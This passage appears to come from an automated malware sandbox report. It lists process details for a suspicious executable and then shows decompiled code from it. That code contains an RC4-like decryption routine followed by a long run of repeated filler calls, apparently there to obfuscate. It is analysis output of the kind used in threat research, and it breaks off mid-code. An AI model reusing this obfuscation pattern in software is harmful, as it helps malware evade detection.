Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6448 Parent PID: 556

General

Start time:	08:27:58
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 1256 Parent PID: 5368

General

Start time:	08:28:00
Start date:	13/09/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff6a4800000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 2076 Parent PID: 1256

General

Start time:	08:28:01
Start date:	13/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 8U5snojV8p.exe PID: 6372 Parent PID: 964 8U5snojV8p.exeCOMMON

Executed Functions

Function 0040133E, Relevance: 1901.2, APIs: 813, Strings: 271, Instructions: 4157
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040133E(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				signed int* _t69;
				char _t70;
				signed int _t75;
				signed int _t78;
				signed int* _t902;
				signed char _t905;
				char* _t909;
				char _t915;
				signed int _t927;
				signed char _t928;
				signed int _t930;
				signed int _t934;
				signed int _t939;
				long long* _t944;
				long long* _t946;
				long long* _t947;
				long long* _t948;
				long long* _t949;
				long long* _t950;
				long long* _t951;
				long long* _t952;
				long long* _t953;
				long long* _t954;
				long long* _t955;
				long long* _t956;
				long long* _t957;
				long long* _t958;
				long long* _t959;
				long long* _t960;
				long long* _t961;
				long long* _t962;
				long long* _t963;
				long long* _t964;
				long long* _t965;
				long long* _t966;
				long long* _t967;
				long long* _t968;
				long long* _t969;
				long long* _t970;
				long long* _t971;
				long long* _t972;
				long long* _t973;
				long long* _t974;
				long long* _t975;
				long long* _t976;
				long long* _t977;
				long long* _t978;
				long long* _t979;
				long long* _t980;
				long long* _t981;
				long long* _t982;
				long long* _t983;
				long long* _t984;
				long long* _t985;
				long long* _t986;
				long long* _t987;
				long long* _t988;
				long long* _t989;
				long long* _t990;
				long long* _t991;
				long long* _t992;
				long long* _t993;
				long long* _t994;
				long long* _t995;
				long long* _t996;
				long long* _t997;
				long long* _t998;
				long long* _t999;
				long long* _t1000;
				long long* _t1001;
				long long* _t1002;
				long long* _t1003;
				long long* _t1004;
				long long* _t1005;
				long long* _t1006;
				long long* _t1007;
				long long* _t1008;
				long long* _t1009;
				long long* _t1010;
				long long* _t1011;
				long long* _t1012;
				long long* _t1013;
				long long* _t1014;
				long long* _t1015;
				long long* _t1016;
				long long* _t1017;
				long long* _t1018;
				long long* _t1019;
				long long* _t1020;
				long long* _t1021;
				long long* _t1022;
				long long* _t1023;
				long long* _t1024;
				long long* _t1025;
				long long* _t1026;
				long long* _t1027;
				long long* _t1028;
				long long* _t1029;
				long long* _t1030;
				long long* _t1031;
				long long* _t1032;
				long long* _t1033;
				long long* _t1034;
				long long* _t1035;
				long long* _t1036;
				long long* _t1037;
				long long* _t1038;
				long long* _t1039;
				long long* _t1040;
				long long* _t1041;
				long long* _t1042;
				long long* _t1043;
				long long* _t1044;
				long long* _t1045;
				long long* _t1046;
				long long* _t1047;
				long long* _t1048;
				long long* _t1049;
				long long* _t1050;
				long long* _t1051;
				long long* _t1052;
				long long* _t1053;
				long long* _t1054;
				long long* _t1055;
				long long* _t1056;
				long long* _t1057;
				long long* _t1058;
				long long* _t1059;
				long long* _t1060;
				long long* _t1061;
				long long* _t1062;
				long long* _t1063;
				long long* _t1064;
				long long* _t1065;
				long long* _t1066;
				long long* _t1067;
				long long* _t1068;
				long long* _t1069;
				long long* _t1070;
				long long* _t1071;
				long long* _t1072;
				long long* _t1073;
				long long* _t1074;
				long long* _t1075;
				long long* _t1076;
				long long* _t1077;
				long long* _t1078;
				long long* _t1079;
				long long* _t1080;
				long long* _t1081;
				long long* _t1082;
				long long* _t1083;
				long long* _t1084;
				long long* _t1085;
				long long* _t1086;
				long long* _t1087;
				long long* _t1088;
				long long* _t1089;
				long long* _t1090;
				long long* _t1091;
				long long* _t1092;
				long long* _t1093;
				long long* _t1094;
				long long* _t1095;
				long long* _t1096;
				long long* _t1097;
				long long* _t1098;
				long long* _t1099;
				long long* _t1100;
				long long* _t1101;
				long long* _t1102;
				long long* _t1103;
				long long* _t1104;
				long long* _t1105;
				long long* _t1106;
				long long* _t1107;
				long long* _t1108;
				long long* _t1109;
				long long* _t1110;
				long long* _t1111;
				long long* _t1112;
				long long* _t1113;
				long long* _t1114;
				long long* _t1115;
				long long* _t1116;
				long long* _t1117;
				long long* _t1118;
				long long* _t1119;
				long long* _t1120;
				long long* _t1121;
				long long* _t1122;
				long long* _t1123;
				long long* _t1124;
				long long* _t1125;
				long long* _t1126;
				long long* _t1127;
				long long* _t1128;
				long long* _t1129;
				long long* _t1130;
				long long* _t1131;
				long long* _t1132;
				long long* _t1133;
				long long* _t1134;
				long long* _t1135;
				long long* _t1136;
				long long* _t1137;
				long long* _t1138;
				long long* _t1139;
				long long* _t1140;
				long long* _t1141;
				long long* _t1142;
				long long* _t1143;
				long long* _t1144;
				long long* _t1145;
				long long* _t1146;
				long long* _t1147;
				long long* _t1148;
				long long* _t1149;
				long long* _t1150;
				long long* _t1151;
				long long* _t1152;
				long long* _t1153;
				long long* _t1154;
				long long* _t1155;
				long long* _t1156;
				long long* _t1157;
				long long* _t1158;
				long long* _t1159;
				long long* _t1160;
				long long* _t1161;
				long long* _t1162;
				long long* _t1163;
				long long* _t1164;
				long long* _t1165;
				long long* _t1166;
				long long* _t1167;
				long long* _t1168;
				long long* _t1169;
				long long* _t1170;
				long long* _t1171;
				long long* _t1172;
				long long* _t1173;
				long long* _t1174;
				long long* _t1175;
				long long* _t1176;
				long long* _t1177;
				long long* _t1178;
				long long* _t1179;
				long long* _t1180;
				long long* _t1181;
				long long* _t1182;
				long long* _t1183;
				long long* _t1184;
				long long* _t1185;
				long long* _t1186;
				long long* _t1187;
				long long* _t1188;
				long long* _t1189;
				long long* _t1190;
				long long* _t1191;
				long long* _t1192;
				long long* _t1193;
				long long* _t1194;
				long long* _t1195;
				long long* _t1196;
				long long* _t1197;
				long long* _t1198;
				long long* _t1199;
				long long* _t1200;
				long long* _t1201;
				long long* _t1202;
				long long* _t1203;
				long long* _t1204;
				long long* _t1205;
				long long* _t1206;
				long long* _t1207;
				long long* _t1208;
				long long* _t1209;
				long long* _t1210;
				long long* _t1211;
				long long* _t1212;
				long long* _t1213;
				long long* _t1214;
				long long* _t1215;

				E004269B0(0x127c0, __ecx);
				if( *((intOrPtr*)(_t944 + 0x127d4)) <= 0) {
					_t69 = 0;
				} else {
					_t70 = 0;
					do {
						 *((char*)(_t944 + _t70 + 0x18)) = _t70;
						_t70 = _t70 + 1;
					} while (_t70 < 0x127aa);
					_t939 = 0;
					_t934 = 0;
					do {
						_t905 =  *((intOrPtr*)(_t944 + _t934 + 0x24));
						_t909 = _t944 + _t934 + 0x24;
						_t75 = (_t905 & 0x000000ff) + _t939 + ( *(_t934 %  *(_t944 + 0x127d8) +  *((intOrPtr*)(_t944 + 0x127d4))) & 0x000000ff);
						_t934 = _t934 + 1;
						_t939 = _t75 % 0x127aa;
						 *_t909 =  *(_t944 + _t939 + 0x24);
						 *(_t944 + _t939 + 0x24) = _t905;
					} while (_t934 < 0x127aa);
					_t78 = 0;
					 *(_t944 + 0x18) = 0;
					 *(_t944 + 0x20) =  *(_t944 + 0x127dc);
					 *((intOrPtr*)(_t944 + 0x1c)) =  *((intOrPtr*)(_t944 + 0x127e0)) - 1 + 1;
					while(1) {
						_t927 = (_t78 + 1) % 0x127aa;
						 *(_t944 + 0x14) = _t927;
						_t928 =  *((intOrPtr*)(_t944 + _t927 + 0x24));
						 *(_t944 + 0x13) = _t928;
						_t930 = ((_t928 & 0x000000ff) +  *(_t944 + 0x18)) % 0x127aa;
						 *(_t944 + 0x18) = _t930;
						 *(_t944 +  *(_t944 + 0x14) + 0x24) =  *((intOrPtr*)(_t944 + _t930 + 0x24));
						_t915 =  *(_t944 + 0x13);
						_push(0x127aa);
						_push(0x127aa);
						 *((char*)(_t944 + _t930 + 0x24)) = _t915;
						 *_t944 =  *0x42c148;
						printf("Result is:\nalpha=%f"); // executed
						_t946 = _t944 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0); // executed
						_push(_t915);
						_push(_t915);
						 *_t946 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t947 = _t946 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0); // executed
						_push(_t915);
						_push(_t915);
						 *_t947 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t948 = _t947 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t948 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t949 = _t948 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t949 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t950 = _t949 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t950 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t951 = _t950 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t951 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t952 = _t951 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t952 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t953 = _t952 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t953 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t954 = _t953 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t954 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t955 = _t954 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t955 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t956 = _t955 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t956 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t957 = _t956 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t957 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t958 = _t957 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t958 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t959 = _t958 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t959 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t960 = _t959 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t960 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t961 = _t960 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t961 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t962 = _t961 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t962 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t963 = _t962 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t963 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t964 = _t963 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t964 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t965 = _t964 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t965 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t966 = _t965 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t966 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t967 = _t966 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t967 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t968 = _t967 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t968 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t969 = _t968 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t969 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t970 = _t969 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t970 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t971 = _t970 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t971 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t972 = _t971 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t972 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t973 = _t972 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t973 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t974 = _t973 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t974 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t975 = _t974 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t975 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t976 = _t975 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t976 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t977 = _t976 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t977 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t978 = _t977 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t978 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t979 = _t978 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t979 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t980 = _t979 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t980 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t981 = _t980 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t981 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t982 = _t981 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t982 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t983 = _t982 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t983 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t984 = _t983 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t984 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t985 = _t984 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t985 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t986 = _t985 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t986 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t987 = _t986 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t987 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t988 = _t987 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t988 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t989 = _t988 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t989 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t990 = _t989 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t990 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t991 = _t990 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t991 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t992 = _t991 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t992 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t993 = _t992 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t993 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t994 = _t993 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t994 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t995 = _t994 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t995 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t996 = _t995 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t996 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t997 = _t996 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t997 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t998 = _t997 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t998 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t999 = _t998 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t999 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1000 = _t999 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1000 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1001 = _t1000 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1001 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1002 = _t1001 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1002 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1003 = _t1002 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1003 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1004 = _t1003 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1004 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1005 = _t1004 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1005 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1006 = _t1005 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1006 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1007 = _t1006 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1007 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1008 = _t1007 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1008 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1009 = _t1008 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1009 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1010 = _t1009 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1010 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1011 = _t1010 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1011 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1012 = _t1011 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1012 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1013 = _t1012 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1013 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1014 = _t1013 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1014 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1015 = _t1014 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1015 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1016 = _t1015 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1016 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1017 = _t1016 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1017 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1018 = _t1017 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1018 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1019 = _t1018 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1019 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1020 = _t1019 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1020 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1021 = _t1020 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1021 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1022 = _t1021 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1022 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1023 = _t1022 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1023 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1024 = _t1023 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1024 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1025 = _t1024 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1025 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1026 = _t1025 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1026 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1027 = _t1026 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1027 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1028 = _t1027 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1028 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1029 = _t1028 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1029 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1030 = _t1029 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1030 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1031 = _t1030 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1031 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1032 = _t1031 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1032 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1033 = _t1032 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1033 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1034 = _t1033 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1034 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1035 = _t1034 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1035 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1036 = _t1035 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1036 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1037 = _t1036 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1037 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1038 = _t1037 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1038 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1039 = _t1038 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1039 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1040 = _t1039 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1040 =  *0x42c148;
